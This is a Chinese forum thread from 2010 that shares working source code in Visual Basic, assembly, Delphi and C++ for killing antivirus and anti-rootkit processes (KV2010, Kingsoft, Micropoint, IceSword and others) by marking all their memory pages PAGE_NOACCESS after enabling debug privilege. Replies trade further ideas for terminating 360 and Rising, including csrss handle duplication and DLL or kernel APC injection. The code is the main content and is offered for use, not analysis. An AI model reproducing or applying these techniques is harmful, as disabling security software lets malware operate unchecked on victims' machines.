[翻译+转载]无驱动杀死KV2010/金山2011/微点-1.2/冰刃/狙剑/天琊
本帖最后由 Tesla.Angela 于 2010-8-1 23:25 编辑更新内容:
2010-7-21:发现这玩意还能杀死微点,我手头上测试的微点是2010年4月20日编译的(直接用以前下载的版本,没有下载最新版测试)。
2010-7-31:发现此程序无法结束瑞星2009!测试杀瑞星2010是在同学的机子上进行的,不排除他看到SSDT一片红,误以为是病毒干的,就拿冰刃把SSDT全恢复了。
首先感谢Zzzians(syf),提出了使用VirtualProtect破坏进程内存。
其次感谢他的朋友EXTREME,写了核心代码让我参考:http://hi.baidu.com/q_lai_a_qu/blog/item/fa92a982185ca7b26c81193a.html
'//////////////////////////////
'Code by Tesla.Angela(GDUT.HWL)
'Thank to Syf & q_lai_a_qu
'//////////////////////////////
Option Explicit
Private Type SYSTEM_INFO
dwOemID As Long
dwPageSize As Long
lpMinimumApplicationAddress As Long
lpMaximumApplicationAddress As Long
dwActiveProcessorMask As Long
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
dwReserved As Long
End Type
Private Type MEMORY_BASIC_INFORMATION
BaseAddress As Long
AllocationBase As Long
AllocationProtect As Long
RegionSize As Long
State As Long
Protect As Long
lType As Long
End Type
Private Declare Function RtlAdjustPrivilege Lib "ntdll" _
(ByVal a As Long, _
ByVal b As Long, _
ByVal c As Long, _
ByRef d As Long) As Long
Private Declare Function VirtualQueryEx Lib "kernel32.dll" _
(ByVal hProcess As Long, _
ByRef lpAddress As Any, _
ByRef lpBuffer As MEMORY_BASIC_INFORMATION, _
ByVal dwLength As Long) As Long
Private Declare Function VirtualProtectEx Lib "kernel32.dll" _
(ByVal hProcess As Long, _
ByRef lpAddress As Any, _
ByVal dwSize As Long, _
ByVal flNewProtect As Long, _
ByRef lpflOldProtect As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" _
(ByVal hObject As Long) As Long
Private Declare Sub GetSystemInfo Lib "kernel32.dll" _
(ByRef lpSystemInfo As SYSTEM_INFO)
Private Const PROCESS_VM_READ As Long = (&H10)
Private Const PROCESS_VM_OPERATION As Long = (&H8)
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const PAGE_NOACCESS As Long = &H1
Private Sub VmpKillProcess(ByVal PID As Long)
Dim MaxAddr As Long, MinAddr As Long, CurAddr As Long, PageSize As Long, OldProtect As Long, hProc As Long
Dim SysInfo As SYSTEM_INFO
Dim MemBasicInfo As MEMORY_BASIC_INFORMATION
Call GetSystemInfo(SysInfo)
MinAddr = SysInfo.lpMinimumApplicationAddress
MaxAddr = SysInfo.lpMaximumApplicationAddress
PageSize = SysInfo.dwPageSize
hProc = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_QUERY_INFORMATION, False, PID)
For CurAddr = MinAddr To MaxAddr Step PageSize
If (VirtualQueryEx(hProc, ByVal CurAddr, MemBasicInfo, 28)) Then
Call VirtualProtectEx(hProc, ByVal MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, OldProtect)
End If
Next
Call CloseHandle(hProc)
End Sub
Public Sub Main()
RtlAdjustPrivilege 20, 1, 0, 0
Call VmpKillProcess(CLng(InputBox("PID=", "SyfKillProcess")))
End Sub
记住使用复制句柄的方式打开进程,以及要获得SE_DEBUG权限。 本帖最后由 Tesla.Angela 于 2010-8-1 23:30 编辑
顺便装一下B,贴出我翻译的ASM代码:
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc
includelib user32.lib
includelib kernel32.lib
includelib masm32.lib
include macro.asm
.data
NtDllDll db 'NTDLL.DLL',0
GetDebug db 'RtlAdjustPrivilege',0
.code
START:
getp proc
local hNtdll:DWORD
local pRtlAdjustPrivilege:DWORD
local rtv:DWORD
invoke LoadLibrary,offset NtDllDll
mov hNtdll,eax
invoke GetProcAddress,hNtdll,offset GetDebug
mov pRtlAdjustPrivilege,eax
;RtlAdjustPrivilege(20,1,0,VarPtr(rtv))
lea eax,rtv
push eax
push 0
push 1
push 20
call pRtlAdjustPrivilege
getp endp
vpkp proc
local MaxAddr:DWORD
local MinAddr:DWORD
local CurAddr:DWORD
local PageSize:DWORD
local OldProtect:DWORD
local PID:DWORD
local hProc:DWORD
local VirtualQueryExRt:DWORD
local SysInfo:SYSTEM_INFO
local MemBasicInfo:MEMORY_BASIC_INFORMATION
mov eax,8888 ;这里是待杀死进程的PID
mov PID,eax
invoke GetSystemInfo,addr SysInfo
mov eax,SysInfo.lpMinimumApplicationAddress
mov MinAddr,eax
mov eax,MinAddr
mov CurAddr,eax
mov eax,SysInfo.lpMaximumApplicationAddress
mov MaxAddr,eax
mov ebx,MaxAddr
mov eax,SysInfo.dwPageSize
mov PageSize,eax
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,PID
mov hProc,eax
.while CurAddr <= ebx
invoke VirtualQueryEx,hProc,CurAddr,addr MemBasicInfo,sizeof MEMORY_BASIC_INFORMATION
mov VirtualQueryExRt,eax
.if VirtualQueryExRt!=0
invoke VirtualProtectEx,hProc,MemBasicInfo.BaseAddress,MemBasicInfo.RegionSize,PAGE_NOACCESS,addr OldProtect
.endif
mov ecx,CurAddr
mov edx,PageSize
add ecx,edx
mov CurAddr,ecx
mov ebx,MaxAddr
.endw
invoke CloseHandle,hProc
vpkp endp
invoke ExitProcess,0
end START
转载:9908006 写的Delphi版代码
function GetMemoryRegion(pid: dword): Boolean;
var
TempStartAddress: DWord;
TempEndAddress: DWord;
OldProtect: dword;
ProcHandle: dword;
MBI: _MEMORY_BASIC_INFORMATION; //---------------------------内存信息变量
begin
Result := False;
ProcHandle := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if ProcHandle = 0 then ProcHandle := fcopenprocess(pid);
if ProcHandle = 0 then ProcHandle := myopenprocess(pid);
TempStartAddress := 1 * 1024 * 1024; //$100000
TempEndAddress := 2 * 1024 * 1024; //$200000
TempEndAddress := TempEndAddress * 1024; //$40000000
while (VirtualQueryEx(ProcHandle,
pointer(TempStartAddress),
MBI,
sizeof(MBI)) > 0) and (TempStartAddress < TempEndAddress) do
begin
if (MBI.State = MEM_COMMIT) then
begin
if (MBI.Protect = PAGE_READWRITE) or
(MBI.Protect = PAGE_WRITECOPY) or
(MBI.Protect = PAGE_EXECUTE_READWRITE) or
(MBI.Protect = PAGE_EXECUTE_WRITECOPY)
then
begin
VirtualProtectEx(ProcHandle, MBI.BaseAddress, MBI.RegionSize, PAGE_NOACCESS, @OldProtect);
//PMemoryRegion.BaseAddress := Dword(MBI.BaseAddress);
//PMemoryRegion.MemorySize := MBI.RegionSize;
//Inc(MemoryRegionsIndex);
end;
end;
TempStartAddress := Dword(MBI.BaseAddress) + MBI.RegionSize;
end;
closehandle(prochandle);
Result := True;
end;
转载:Q来A去写的原版c++代码
BOOL VPKillProc(DWORD PID)
{
DWORD MaxAddr;
DWORD CurAddr;
DWORD PageSize;
DWORD OldProtect;
HANDLE hProc;
SYSTEM_INFO SysInfo;
MEMORY_BASIC_INFORMATION MemBasicInfo;
GetSystemInfo(&SysInfo);
MaxAddr = (DWORD)SysInfo.lpMaximumApplicationAddress;
PageSize = SysInfo.dwPageSize;
hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, PID);
for (CurAddr = (DWORD)SysInfo.lpMinimumApplicationAddress; CurAddr <= MaxAddr; CurAddr += PageSize)
{
//
// Main loop: if the address is valid, make it unaccessible
//
if (VirtualQueryEx(hProc, (LPVOID)(CurAddr), &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION)))
{
VirtualProtectEx(hProc, MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, &OldProtect);
CurAddr += MemBasicInfo.RegionSize;
}
}
//
// Check if the process is dead
//
CloseHandle(hProc);
if (OpenProcess(PROCESS_VM_READ, FALSE, PID))
{
CloseHandle(hProc);
return FALSE;
}
return TRUE;
}
我是前来膜拜的,哈哈! 看看。学习。 有点好奇,看下是什么 大出血啊,这玩艺杀不死瑞星,虚假广告!哈哈 不会吧?我记得瑞星是不允许复制句柄的,它学了360,不允许从csrss中复制任何句柄,有测试瑞星最新版的童鞋没? 当然,如果注入csrss,再xxxx,是可以的,但如果360和瑞星装在一起,就无法注入csrss了,狼与狈的组合啊 360tray.exe能杀死就好了............... 这个...这个...貌似在6个月前看过.. 这个...这个...好像每次你发给我的说不要我发每次都会被你发出来... 强悍!~·········· 膜拜膜拜 不会吧?这个代码能够Kill这么多的东东?!
膜拜ZZZians 不知道直接使用csrss里的句柄再加上这个VmpKillProcess能不能杀掉360。。。
naylon 发表于 2010-8-5 17:03 http://www.m5home.com/bbs/images/common/back.gif
如果能注入到csrss并获得句柄,用这种方式杀360就不优美了。
优美的方式是插入dll,DllMain里来个DebugBreak,或者memcpy(3,2,1)。 本帖最后由 Tesla.Angela 于 2010-8-8 22:38 编辑
回复Tesla.Angela
好像在360启动之后没法插DLL吧?
naylon 发表于 2010-8-8 10:19 http://www.m5home.com/bbs/images/common/back.gif
R3貌似是无法插入了,Ring0用APC插入应该还可以吧。 好資料 值得學習一下
页:
[1]